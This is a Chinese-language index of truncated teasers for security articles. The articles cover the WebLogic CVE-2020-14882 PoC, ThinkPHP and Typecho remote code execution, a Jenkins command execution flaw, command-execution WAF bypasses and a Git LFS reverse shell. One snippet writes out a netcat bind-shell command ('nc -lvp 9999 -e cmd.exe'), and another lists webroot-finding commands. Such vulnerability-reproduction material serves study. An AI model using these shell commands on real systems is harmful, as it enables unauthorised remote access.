漏洞介绍 近日，Oracle WebLogic Server 远程代码执行漏洞 （CVE-2020-14882）POC 被公开，未经身份验证的远程攻击者可通过构造特殊的 HTTP GET 请求，结合 ...

NC 反弹 shell 攻击场景： 正向 Shell 我们想要弹回Victim的Shell，使用如下命令： Victim：nc -lvp 9999 -e cmd.exe Att ...

本文首发自安全脉搏，转载请注明出处。 前言 ThinkPHP官方最近修复了一个严重的远程代码执行漏洞。这个主要漏洞原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶 ...

Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述： Typecho是一款快速建博客的程序，外观简洁，应用广泛。这次的漏洞通过install.php安装程序页面的反序列化函 ...

漏洞概述： 国外网站 Contrast Security 于2016年2月24日在公开了Jenkins近日修复的一个可通过低权限用户调用 API 服务致使的命令执行漏洞详情。通过低权限用户构造 ...

0x00 序言   总结下命令执行绕过字母数字的一些小技巧。 0x01 原理   管理员为了防止任意用户输入的恶意代码导致的命令执行，在用户输入处加了一层waf拦截，waf可能是通过正则匹配过滤 ...

前言 在PHP语言中，单引号和双引号都可以表示一个字符串，但是对于双引号来说，可能会对引号内的内容进行二次解释，这就可能会出现安全问题。 正文 举个简单例子 可以看到这两个输出的结果并不相 ...

Git命令造成的反弹shell 漏洞描述： 　　Git LFS可以.lfsconfig使用LFS由存储库中的文件配置（部分），并且可以将Git LFS指向ssh://。 　　 ...

寻找web的路径 ( 1 ) 文件查找法 linux: find / -name index.php find / -name index.* windows: for /r d:/ %i ...